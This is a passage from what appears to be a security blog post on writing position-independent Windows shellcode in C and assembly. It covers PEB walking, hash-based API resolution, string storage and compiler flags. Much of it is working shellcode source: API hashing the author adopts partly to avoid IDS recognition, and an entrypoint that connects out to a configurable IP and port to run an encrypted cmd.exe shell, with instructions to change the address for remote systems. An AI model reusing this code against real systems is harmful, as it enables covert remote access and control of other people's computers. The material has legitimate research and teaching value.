    test   eax, eax       ; if (oft->u1.Function == 0)
    jz     imp_l0         ; goto imp_l0
    js     imp_l1         ; oft->u1.Ordinal & IMAGE_ORDINAL_FLAG

    lea    eax, [eax+ebx+2] ; oft->Name_ (skip the 2-byte Hint)
    call   crc32c           ; get crc of API string

    add    eax, [esp+_edx]  ; eax = api_h + dll_h
    cmp    [esp+_ecx], eax  ; found match?
    jne    imp_l1

    mov    eax, [edi-4]     ; ft->u1.Function (edi was already advanced past the entry)
imp_l2:
    mov    [esp+_eax], eax  ; result is returned in eax by popad
    popad
    ret

Process Environment Block

Perhaps this part should precede everything else?

Another “advancement” arrived with the publication of Gaining important datas from PEB under NT boxes by Ratter/29A in 2002. There was a better way to obtain base address of KERNEL32.DLL simply by reading it from the PEB.

Here I’m using structures from Matt Graeber’s PIC_Bindshell

// Look up an API address by hash across the modules listed in the PEB.
//
//   dwHash - hash of the wanted API, in the form search_imp expects
//
// Walks the load-order module list starting at its first entry and calls
// search_imp on each module base. The walk ends at the first entry whose
// DllBase is NULL. Returns the first non-NULL result, or NULL if no module
// yields a match.
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY entry;
  LPVOID                   found;

  // the PEB pointer is read from the segment register for the target
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr   = (PMY_PEB_LDR_DATA)peb->Ldr;
  entry = (PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;

  // for each DLL loaded
  while (entry->DllBase != NULL)
  {
    found = search_imp(entry->DllBase, dwHash);
    if (found != NULL) {
      return found;
    }
    entry = (PMY_LDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;
  }
  return NULL;
}

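The assembly walks the module list in the same way, with some minor optimizations. Note that it calls search_expx (the export table search) for each module, whereas the C version above calls search_imp.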

; LPVOID get_apix(DWORD hash);
;
; x86 (32-bit). Walks the load-order module list found through the PEB and
; calls search_expx on each module until it returns non-zero.
;
; in:  [esp+4] = hash (stack argument; the plain RET leaves it for the caller to remove)
; out: eax = resolved address, or 0 if no module matched
;
; _eax is defined outside this listing; it is used as the offset of the saved
; EAX within the PUSHAD frame.
get_apix:
_get_apix:
    pushad
    mov    ecx, [esp+32+4] ; ecx = hash (32 bytes of PUSHAD + 4 bytes of return address)
    push   30h
    pop    eax

    mov    eax, [fs:eax]  ; eax = (PPEB) __readfsdword(0x30);
    mov    eax, [eax+0ch] ; eax = (PMY_PEB_LDR_DATA)peb->Ldr
    mov    edi, [eax+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
    jmp    gapi_l1
gapi_l0:
    call   search_expx    ; in: ebx = module base, ecx = hash
    test   eax, eax
    jnz    gapi_l2        ; found

    mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink
gapi_l1:
    mov    ebx, [edi+18h] ; ebx = dte->DllBase
    test   ebx, ebx
    jnz    gapi_l0
    xchg   eax, ebx       ; DllBase == 0 ends the walk: eax = 0
gapi_l2:
    mov    [esp+_eax], eax  ; result is returned in eax by popad
    popad
    ret

Hash algorithm

For both examples, I use CRC-32C checksum. The C stands for Castagnoli polynomial. I’ve used it simply because there were no collisions for 80,000 API tested. Some existing hash algorithms provide “good enough” results but the advantage of using CRC-32C is that it is now supported by INTEL cpus since the release of SSE4.2

It should be clear however that the OR operation of bytes with 0x20 is not part of the CRC-32C specification. This is only here to convert strings to lowercase before hashing. Sometimes kernel32.dll can appear as uppercase so it should be converted to lowercase.

In the Metasploit code, the module is converted to uppercase instead.

// Case-insensitive CRC-32C style checksum of a null terminated string.
//
// Every byte, including the terminating null, is ORed with 0x20 before it is
// folded into the checksum, so "ABC" and "abc" hash to the same value. The
// checksum starts at 0 and is returned without a final inversion.
uint32_t crc32c(const char *s)
{
  uint32_t crc = 0;
  uint8_t  ch;
  int      bit;

  for (;;) {
    ch   = (uint8_t)*s++;
    crc ^= (uint8_t)(ch | 0x20);

    // reflected Castagnoli polynomial, one bit at a time
    for (bit = 8; bit != 0; bit--) {
      if (crc & 1) {
        crc = (crc >> 1) ^ 0x82F63B78;
      } else {
        crc >>= 1;
      }
    }
    // the terminator itself has just been hashed
    if (ch == 0) break;
  }
  return crc;
}

Here’s the code using built in instruction.

; Checksum loop using the CRC32 instruction.
; Expects esi to point at a null terminated string; the result accumulates in edx.
; Each byte is ORed with 0x20 first, so the terminating null is hashed as 0x20.
    xor    eax, eax
    cdq                ; edx = 0, initial checksum
crc_l0:
    lodsb              ; al = *s++
    or     al, 0x20
    crc32  edx, al
    cmp    al, 0x20    ; al == 0x20 here means the byte read was 0x00 or 0x20
    jne    crc_l0

Here’s code for CPUs without the support for SSE4.2

; crc32c - bitwise checksum of a null terminated string (x86, 32-bit)
;
; in: eax = s
; out: crc-32c(s)
;
; Each byte, including the terminating null, is ORed with 0x20 before it is
; folded in. All registers other than eax are preserved by PUSHAD/POPAD.
; _eax is defined outside this listing; it is used as the offset of the saved
; EAX within the PUSHAD frame.
;
crc32c:    
    pushad
    xchg   eax, esi          ; esi = s
    xor    eax, eax          ; eax = 0
    cdq                      ; edx = 0
crc_l0:
    lodsb                    ; al = *s++ | 0x20
    or     al, 0x20
    xor    dl, al            ; crc ^= c
    push   8
    pop    ecx               ; 8 bits per byte
crc_l1:
    shr    edx, 1            ; crc >>= 1
    jnc    crc_l2            ; apply the polynomial only if the bit shifted out was 1
    xor    edx, 0x82F63B78
crc_l2:
    loop   crc_l1
    sub    al, 0x20          ; until al==0
    jnz    crc_l0    
    mov    [esp+_eax], edx   ; result is returned in eax by popad
    popad
    ret

Of course, CRC-32C is not collision resistant. In some cases, you might need to consider using a cryptographic hash algorithm. The smallest I can think of would be CubeHash by Daniel Bernstein.

Although, you could also use a tiny block or stream cipher to encrypt the strings and truncate the ciphertext to 32 or 64-bits. Not sure how collision resistant that would be but it’s worth exploring.

Summary

Parsing the import and export tables isn’t a really difficult task. With all the sources and documentation available, there’s really no excuse to avoid using either in a PIC. Using hardcoded API addresses or looking up by ordinal is a recipe for disaster.

By writing your code in C first and generating assembly output with /FAs switch of MSVC, this should make parsing in assembly much easier to understand.

getapi.c contains code in C to locate API by CRC-32C hash. x86.asm and x64.asm contain the code in assembly to locate API by CRC-32C hash.

Posted in assembly, programming, shellcode, windows | Tagged , , , , , , , , | 2 Comments

Shellcode: A Windows PIC using RSA-2048 key exchange, AES-256, SHA-3

Introduction

This won’t be a tutorial on writing shellcode although you might glean something useful from the source code when writing your own PIC in C. This is a PIC (Position Independent Code) for the Windows Operating System written in C with some additional assembly code to handle stack limit issues. There are C arrays of the assembly code for x86 here and for x64 here. You must change the IP address from 127.0.0.1 and port number 1234 if testing for remote systems.

The idea of writing windows shellcodes with C is nothing new and was demonstrated by a number of people already. AFAIK, the first example of this was shown by Didier Stevens in his 2010 article for hakin9 magazine simply called Writing WIN32 Shellcode With a C-compiler.

Nick Harbour also discusses the idea in Writing Shellcode with a C Compiler and Matt Graeber shows how to build a bind shell in his article Writing Optimized Windows Shellcode in C which I’ve borrowed some ideas and code from for my own PIC.

Just this year, a Shellcode Compiler was released which can compile a script into assembly. Of course there are other source codes out there such as this and even a c++ example such as this taking advantage of the constexpr feature.

Apologies to anyone who has been involved with this subject that I missed.

In March this year, I wrote a 4 part series on some simple interactive “shells” for the windows operating system and the PIC client here can be used with this server which is derived from s4.c discussed in Part 4. The main difference is the PIC client and new server both use SHA-3 and AES-256 for authenticated encryption with some modular arithmetic functions to perform key exchange similar to RSA.

Those of you familiar with shellcode found in generators such as Veil, Metasploit or at online shellcode databases like Exploit Database will know they do not use encrypted communication between two hosts except if using WININET API for TLS connections or a static key with RC4.

I’ll just briefly discuss some things that are good to know when writing your own PIC in C for Windows. I’ll continue to update this as code develops.

  1. C or C++?
  2. C or ASM?
  3. Memory layout
  4. Resolving API
  5. Storing strings
  6. CPU intrinsics
  7. Big number arithmetic
  8. Authenticated Encryption
  9. Todo

C or C++?

Those of you familiar with OOP (Object Oriented Programming) languages will know what a class is and the purpose of properties and methods.

C is a POP (Procedure Oriented Programming) language which doesn’t support classes but we can emulate them using structures and the reason I’m using C and not C++ to write a PIC has nothing to do with understanding object oriented concepts. I just feel C++ is too close to Java, .NET and other managed code which all hide a lot of low level code from the programmer.

There are new features of C++ that would be invaluable for developing PICs and I encourage anyone to explore its features and not be dissuaded by my decision to use C instead.

One such feature is the constexpr specifier which is incredibly useful for generating hashes of strings at compile time whereas with C, they need to be hardcoded unless linking with some assembly code containing macros.

A structure is used in my own PIC to emulate a class since most of the functions must be resolved at runtime. This structure is passed to each procedure so that it can access what I’ll refer to in future as global memory.

C or ASM?

Traditionally, shellcodes have always been written in assembly for the target architecture an operating system runs on. As hardware technology advanced over the last 20 years, so did complexity of operating systems and there was also the birth of new languages designed to be more cost effective for a business. The consequence of these advancements led to fewer and fewer people writing applications in assembly since the hardware no longer suffered limitations of early personal computers.

RAM and ROM space are no longer a factor for the majority of computing devices running an operating system. Compilers are efficient at generating code either optimized for speed or size and high level languages for the most part offer the ability to rapidly develop applications with chance of fewer bugs. Writing assembly today is largely confined to microcomputing devices such as the Atmel AVR 8-bit and 32-bit Microcontrollers.

As someone that’s programmed with both C and ASM on and off for some years now, there was a time when I thought assembly was the only language for writing shellcode. But the kinds of shellcode I was writing back then were very simple and there wasn’t any consideration for information transmitted between two systems being compromised by a third party. So when I decided to try to write shellcode that used encryption, I knew there would be a lot of code involved and that it would be a nightmare to debug.

So the codes I wrote in the past were small but this PIC can exceed 5KB once extracted from binary which is something I really wouldn’t want to write by hand, although it’s safe to assume an assembly version is likely to be at least 50% smaller.

For a PIC like this using encryption of packets, it’s certainly doable to implement the entire thing in Assembly but I can imagine it being an unpleasant experience. The purpose of the Asmcodes series was essentially to evaluate potential cryptographic primitives for shellcode.

I think it would be wise to develop a PIC in C first before considering an assembly implementation. Once you’ve ironed out any problems, that will make writing assembly much easier.

Memory layout

A general layout of our global memory is required for data and API addresses. API addresses are likely to consume less space than data so I would recommend placing a structure for API at the very beginning of allocated memory.

For this particular code, we use some (but not all) 28 API which requires 112 bytes on x86 and 224 bytes for x64. I’ll explain later why some are not currently used, it’s mostly for legacy reasons.

They are resolved by 32-bit hash from the PEB (Process Environment Block) that contains among many other things a list of DLL (Dynamic-link Libraries) loaded into our target process.

We identify the variables that will be required by multiple functions and declare these in a structure I’ve simply called v_tbl. (I may need to revise this as some may think it means virtual table)

Pointers to API addresses are stored in a structure called f_tbl and this is then placed inside another structure with v_tbl to define our global memory.

Anyone that’s ever looked at disassembly for a C++ program will notice that each class object or instance of an object is passed to each class method. I’ve adopted a similar approach in C except you can visibly see the parameter passed to each function in source code.

If you’re familiar with object oriented programming, you can view the v_tbl structure as properties of a class and the f_tbl structure as methods. So you might be asking why not just have all memory space in one area? There’s a reason to separate the two and it’s mainly to do with reducing opcode sizes.

In assembly, it would be ideal to store API at start of structure and data variables at end so that we’re accessing the API with the least amount of bytes.

It may be possible to use a free unused or reserved slot in the TEB (Thread Environment Block) or PEB (Process Environment Block) which we can then access from each function through the FS or GS selector depending on version of Windows but I have not investigated this.

Another issue is the use of stack for storing data. cs32.asm and cs64.asm are required to allocate large blocks of stack memory.

As a general rule I would advise you minimize amount of stack allocated to avoid crashing on some systems. In future I will most likely use the heap for global memory instead of stack.

Data structure

The v_tbl represents our variables which are for the most part required by more than one function, but not all. Actually, this could be reduced but it’ll do for now.

// shellcode data structure
// Variables half of the PIC's global memory. An instance lives inside
// sc_tbl and is reached by every function through the sc_tbl pointer
// passed to it.
typedef struct _sc_v_tbl_t {
  spp_blk             blk;    // packet block; spp_mac() hashes blk.buf
  SOCKET              s;      // socket
  HANDLE              out1;   // CreateNamedPipe
  HANDLE              in0;    // CreatePipe read
  HANDLE              in1;    // CreatePipe write
  HANDLE              out0;   // CreateFile
  // event handles start here
  HANDLE              evt0;   // WSACreateEvent
  HANDLE              evt1;   // CreateEvent for cmd.exe
  PROCESS_INFORMATION pi;     // presumably the spawned cmd.exe -- TODO confirm
  DWORD               evt_cnt; // presumably number of event handles in use -- TODO confirm
  DWORD               secure;
  HCRYPTPROV          hProv;  // provider acquired with CryptAcquireContext in entrypoint
  spp_tek             tek;    // key material; tek.mkey is the MAC key read by spp_mac()
  aes_ctx             ctx;    // AES context (its use is not visible in this section)
} v_tbl;

Code structure

The f_tbl represents our ‘function table’ which is just a structure to hold addresses of each API required by all functions. Even if the application space does not use TCP, the PIC will initialize Windows Sockets before attempting to make an outgoing connection.

// api table structure
// Function table: one pointer per API the PIC resolves at runtime.
//
// The union lets the same storage be filled by index (api[i]) and called
// by name (pCreatePipe, psend, ...). entrypoint fills api[i] from its
// api_tbl[] hash list, so the member order below must stay identical to
// the order of the hashes there: 15 kernel32, 10 ws2_32, 3 advapi32.
typedef struct _sc_f_tbl_t {
  union {
    LPVOID api[28];   // indexed view used while resolving
    struct {
      // kernel32
      CreateNamedPipe_t                pCreateNamedPipe;
      CreatePipe_t                     pCreatePipe;
      CreateFile_t                     pCreateFile;
      WriteFile_t                      pWriteFile;
      ReadFile_t                       pReadFile;
      GetOverlappedResult_t            pGetOverlappedResult;
      CreateProcess_t                  pCreateProcess;
      TerminateProcess_t               pTerminateProcess;
      CreateEvent_t                    pCreateEvent;
      GetTickCount_t                   pGetTickCount;
      GetLastError_t                   pGetLastError;
      CloseHandle_t                    pCloseHandle;
      WaitForMultipleObjects_t         pWaitForMultipleObjects;
      Wow64DisableWow64FsRedirection_t pWow64DisableWow64FsRedirection;
      GetFileSizeEx_t                  pGetFileSizeEx;
      // ws2_32
      socket_t                         psocket;
      connect_t                        pconnect;
      send_t                           psend;
      recv_t                           precv;
      closesocket_t                    pclosesocket;
      ioctlsocket_t                    pioctlsocket;
      WSAEventSelect_t                 pWSAEventSelect;
      WSAEnumNetworkEvents_t           pWSAEnumNetworkEvents;
      WSACreateEvent_t                 pWSACreateEvent;
      WSAStartup_t                     pWSAStartup;
      // advapi32
      CryptAcquireContextA_t           pCryptAcquireContext;
      CryptGenRandom_t                 pCryptGenRandom;
      CryptReleaseContext_t            pCryptReleaseContext;
    };
  };
} f_tbl;

Both f_tbl and v_tbl are placed in one structure and this represents our global memory.

// Global memory of the PIC: the API pointers come first, followed by the
// shared variables. A pointer to this structure is handed to each function
// (e.g. key_xchg, dispatch, spp_mac).
typedef struct sc_tbl_t {
  f_tbl f; // function table  (code section)
  v_tbl v; // variables table (data section)
} sc_tbl;

Resolving API

A clever and clean way to resolve and invoke an API which is now part of the Metasploit project is originally based on this shellcode for windows which was used for a CTF by some Spanish dudes in July 2008 well before it was modified and added to Metasploit repository.

While it’s a neat way to call API, some IDS software now easily recognize this as being shellcode and so I’ve reverted back to the traditional method of calling API from C using code based on GetProcAddressWithHash.h from Matt Graeber’s PIC_Bindshell which can also support resolving 64-bit API.

The main modification is how hash of DLL is generated and resolving forward references. Instead of using the Unicode string of DLL in PEB, it’s calculated from the DLL header. In addition to this, if we have a forward reference, a new hash for DLL and API is generated before attempting to resolve.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 * dwHash  : api_hash(export name) + api_hash(DLL name taken
 *           from the module's export directory)
 * returns : address of the matching export, or NULL when no
 *           loaded module provides it
 *
 * A forwarded export ("DLL.Function") is resolved by hashing
 * the forwarder's DLL and function names and searching again.
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt, i, j;
  DWORD                    rva, api_h, dll_h;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll, p;
  LPVOID                   api_adr=NULL;
  CHAR                     dll_name[64], api_name[128];
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    
    // a module may export by ordinal only; with no names there is
    // nothing to hash and sym[cnt-1] would read before the table
    if (cnt==0) continue;
    
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    // calculate hash of DLL string
    dll_h = api_hash(dll);
    
    // walk the name table from last entry to first
    for (; cnt != 0; cnt--) {
      // calculate hash of api string
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // add to DLL hash and compare
      if (api_hash(api)+dll_h != dwHash) continue;
      
      // return address of function
      api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
      
      // is this a forward reference? a forwarder "address" points
      // at a string inside the export directory instead of code
      if ((PBYTE)api_adr >= (PBYTE)exp &&
          (PBYTE)api_adr <  (PBYTE)exp + 
          dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
      {
        DEBUG_PRINT("%08X is forwarded to %s", 
            dwHash, api_adr);
            
        p = (PCHAR)api_adr;
        
        // copy DLL name up to the '.', leaving room for
        // ".DLL" and the terminating zero
        for (i=0; p[i] != 0 && p[i] != '.' && 
            i < sizeof(dll_name)-5; i++) 
        {
          dll_name[i] = p[i];
        }
        // no separator found (malformed or too long): give up
        // on this export instead of hashing a garbage name
        if (p[i] != '.') {
          api_adr = NULL;
          break;
        }
        dll_name[i]   = '.';
        dll_name[i+1] = 'D';
        dll_name[i+2] = 'L';
        dll_name[i+3] = 'L';
        dll_name[i+4] = 0;
        // copy API name to buffer (i is the index of the '.')
        for(j=0; p[++i] != 0 && 
            j < sizeof(api_name)-1; j++) 
        { 
          api_name[j] = p[i]; 
        }
        api_name[j] = 0;
        // calculate hash for DLL and API
        dll_h = api_hash(dll_name);
        api_h = api_hash(api_name);
        DEBUG_PRINT("hash for %s and %s = %08X", 
            dll_name, api_name, dll_h + api_h);
        // now try again; NULL here means the target module is
        // not loaded or does not export the name
        api_adr = getapi(dll_h + api_h);
      }
      break;
    }
    if (api_adr != NULL) break;
  }
  return api_adr;
}

The initialization resolves a table of API hashes and stores in f_tbl on the stack.

/**F*********************************************
 *
 * entrypoint of PIC
 *
 ************************************************/
#ifdef XALONE
void mainCRTStartup(void)
#else
void entrypoint(void)
#endif
{
  WSADATA            wsa;
  struct sockaddr_in sin;
  sc_tbl             x;
  DWORD              i, cnt;
  int                r;
  char               ws2_32[]={'w','s','2','_','3','2','\0'};
  char               adv_32[]={'a','d','v','a','p','i','3','2','\0'};
  LoadLibrary_t      pLoadLibrary;

  DWORD api_tbl[28] = 
{ // kernel32
  0x9B1D3EA9, 0xE6FA65BF, 0x0BEEEE0C, 0xD7F74F5F,
  0xE0E73F55, 0x5874B33B, 0xB6A0D8D1, 0x09228FC6,
  0xC0F188F0, 0xA7C0D163, 0x2608EFA5, 0x9FEA6E52,
  0xB4682C63, 0xCA1BB2C6, 0x727CC43E,
  // ws2_32
  0x9D920334, 0xB50DF1B2, 0x3DD3116A, 0x3B7B117C,
  0xCE2971AD, 0x424589CE, 0x929726BE, 0x272C063F,
  0x26EF0516, 0xB0E0E991,
  // advapi32
  0x86904799, 0xBD78D522, 0xB635E033 };
  
  // zero initialize memory
  memset ((uint8_t*)&x, 0, sizeof(x));
  
  // load required modules just in case unavailable in PEB
  // get address for LoadlibraryA
  pLoadLibrary=(LoadLibrary_t)getapi(0x7C3B28ED);
  
  // load ws2_32 
  pLoadLibrary(ws2_32);
  
  // load advapi32
  pLoadLibrary(adv_32);
  
  // resolve our api addresses
  for (i=0; i<sizeof(api_tbl)/sizeof(DWORD); i++) {
    x.f.api[i]=getapi(api_tbl[i]);
    if (x.f.api[i] == NULL) {
      DEBUG_PRINT("Critical failure: Unable to resolve API for %08X",
          api_tbl[i]);
      //return;
    }
  }
  
  // initialize winsock
  x.f.pWSAStartup (MAKEWORD(2, 2), &wsa);
  
  // initialize crypto
  x.v.hProv=0;
  
  x.f.pCryptAcquireContext (&x.v.hProv, 
      NULL, NULL, PROV_RSA_AES, 
      CRYPT_VERIFYCONTEXT | CRYPT_SILENT);
      
  // create tcp socket
  x.v.s=x.f.psocket (AF_INET, 
      SOCK_STREAM, IPPROTO_TCP);
      
  // initialize network address, this requires changing before deployment
  sin.sin_port             = HTONS(1234);
  sin.sin_family           = AF_INET;
  sin.sin_addr.S_un.S_addr = 0x0100007F; // 127.0.0.1
  
  // connect to server
  r=x.f.pconnect (x.v.s, 
      (const struct sockaddr*)&sin, sizeof (sin));
  
  if (!r)
  {
    // perform key exchange
    key_xchg(&x);
    // execute dispatcher
    dispatch(&x);
  }
  // close socket
  x.f.pclosesocket (x.v.s);
  // release crypto context
  x.f.pCryptReleaseContext(x.v.hProv, 0);
  
  // cleanup and exit, not used in final code
  //WSACleanup();
  //return 0;
}

API hash algorithm

The api_hash algorithm used in the shellcode is exactly the same as the one found in Metasploit, except that strings are converted to lowercase before hashing. A SHA-3 based alternative is shown below; although it works, it is far slower and delays the shellcode by up to 10 seconds on my system while it resolves the API.

// generate sha3-256 hash of dll and api
//
// dll     : zero terminated module name; hashed after OR-ing each byte
//           with 0x20 (lowercases ASCII letters), at most 64 bytes
// api     : zero terminated export name; hashed as is
// returns : first 32 bits of SHA3-256(secret || dll || api)
uint32_t api_hash(char dll[], char api[])
{ 
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX ctx;
  int      i, len;
  uint8_t  f[64+1]; 
  uint32_t s = 0x9e3779b9UL; // change to something unique
    
  SHA3_Init(&ctx, SHA3_256);         // create 256-bit hash
  SHA3_Update(&ctx, &s, sizeof(s));  // unique secret

  // copy dll converted to lowercase
  for (i=0; dll[i] != 0 && i<sizeof(f)-1; i++) {
    f[i] = (dll[i] | 0x20);
  }
  f[i] = 0;
  SHA3_Update(&ctx, f, i);
  
  // count the api name by hand: the PIC is linked without the C
  // runtime, so avoid depending on strlen
  for (len=0; api[len] != 0; len++);
  
  SHA3_Update(&ctx, api, len);
  SHA3_Final(h.b, &ctx);
  
  // only return the first 32-bits
  return h.w[0];
}

If there’s a way to shorten the time required to resolve hashes using SHA-3, I’ll add it later.
Here’s the new getapi function with sha3 hashing included but again it’s too slow.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 * dwHash  : first 32 bits of SHA3-256 over the secret,
 *           the lowercased DLL name and the export name
 * returns : address of the matching export, or NULL
 *
 * The DLL part is hashed once per module into ctx1;
 * each export name is then added to a copy (ctx2).
 * Forwarded exports are not followed by this version.
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt, rva;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll;
  LPVOID                   api_adr=NULL;
  
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX                 ctx1, ctx2;
  int                      i;
  uint8_t                  f[64+1]; 
  uint32_t                 s = 0x9e3779b9UL;
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    
    // ordinal-only modules have no names: skip them rather than
    // read sym[-1] and waste time hashing the DLL name
    if (cnt==0) continue;
    
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    SHA3_Init(&ctx1, SHA3_256);   // create 256-bit hash
    SHA3_Update(&ctx1, &s, sizeof(s));  // unique secret

    // copy dll converted to lowercase
    for (i=0; dll[i] != 0 && i<sizeof(f)-1; i++) {
      f[i] = (dll[i] | 0x20);
    }
    f[i] = 0;
    SHA3_Update(&ctx1, f, i);
  
    // walk the name table from last entry to first
    for (; cnt != 0; cnt--) {
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // length of api string
      for (i=0; api[i] != 0; i++);
      // continue from the shared secret+dll state
      memcpy ((uint8_t*)&ctx2, (uint8_t*)&ctx1, sizeof(SHA3_CTX));
      SHA3_Update(&ctx2, api, i);
      SHA3_Final(h.b, &ctx2);
      // compare first 32 bits of digest with requested hash
      if (h.w[0] == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        break;
      }
    }
    if (api_adr != NULL) break;
  }
  return api_adr;
}

Storing strings

Strings must be stored as character arrays otherwise the compiler will automatically store the string and a pointer to it in the data section which we must avoid for a PIC. For example, this PIC requires socket API from ws2_32.dll and crypto API from advapi32.dll but sometimes these are not already loaded in memory. The PIC will load these 2 libraries before trying to resolve any other API at runtime which requires their names be passed to LoadLibrary API.

// Module names spelled out as character arrays rather than string
// literals, so the compiler does not place them in the data section.
// Both names are passed to LoadLibrary.
char ws2_32[]={'w','s','2','_','3','2','\0'};
char adv_32[]={'a','d','v','a','p','i','3','2','\0'};

CPU intrinsics

Even with /Os flag, sometimes the MSVC compiler will think you’re silly and automatically replace FOR loops with memset or memcpy depending on what the loop does. It’s slightly annoying because if I wanted to use memset or memcpy, I’d use them. Since these are external C library functions, I usually have to replace some FOR loops with intrinsics.

You could of course include your own implementation of memset and memcmp functions which might be a better idea but what I normally do is try using the intrinsic directive which should automatically use STOSB/STOSD for memset, MOVSB/MOVSD for memcpy and CMPSB/CMPSD for memcmp.

#pragma intrinsic(memcmp, memcpy, memset)

However, Microsoft has this to say:

The compiler may call the function and not replace the function call with inline instructions, if it will result in better performance.

If the compiler still doesn’t play ball, I’ll define the following.

// Map the C memory routines straight onto the compiler's string
// instruction intrinsics so no call into the C runtime is generated.
// NOTE(review): these expand to expressions without the return value
// the C functions have, and __movsb presumably always copies forward,
// which would make the memmove mapping unsafe for overlapping buffers
// where the destination lies above the source -- confirm before
// relying on it.
#define memcpy(x,y,z) __movsb(x,y,z)
#define memmove(x,y,z) __movsb(x,y,z)
#define memset(x,y,z) __stosb(x,y,z)

This usually fixes the issue but when the compiler is stubborn and refuses to substitute memset/memcpy I replace both C functions with either __stosb or __movsb directly.

If all that fails! Consider using an older version of MSVC or try mingw. I’m using MSVC 2010 and believe MSVC 2013 and later versions have dropped support for replacing memcmp with REP CMPSB even when /Os is used.

Any other problems might be related to bit rotations used for encryption operations although any decent compiler will avoid using SHR/SHL/OR to perform a bit rotation. When in doubt, try using _rotl or _rotr. For byte swapping use _bswap (INTEL compiler) or _byteswap_ulong (MSVC).

Include the following if switching between MSVC or INTEL compiler.

#ifdef _MSC_VER
#include <intrin.h>
#else
#include <x86intrin.h>
#endif

Compiler Flags

The only flags I’ve used attempt to reduce code and omit stack security checking.

@echo off
rem Build the 32-bit PIC and extract its code.
rem Assemble the stack helper into a win32 object.
yasm -fwin32 cs32.asm -ocs32.obj
rem Compile each C module to an object only (-c). -GS- omits the stack
rem security check and -Oi asks for intrinsic functions.
rem NOTE(review): -Os and -O2 are both given; confirm which one the
rem compiler honours if smallest code is the goal.
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- aes.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- sha3.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- modexp.c
rem -DXALONE names the entry point mainCRTStartup instead of entrypoint.
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- -DXALONE spz.c
rem Link without default libraries at base 0, with function order taken
rem from order.txt and a 1MB reserved/committed stack.
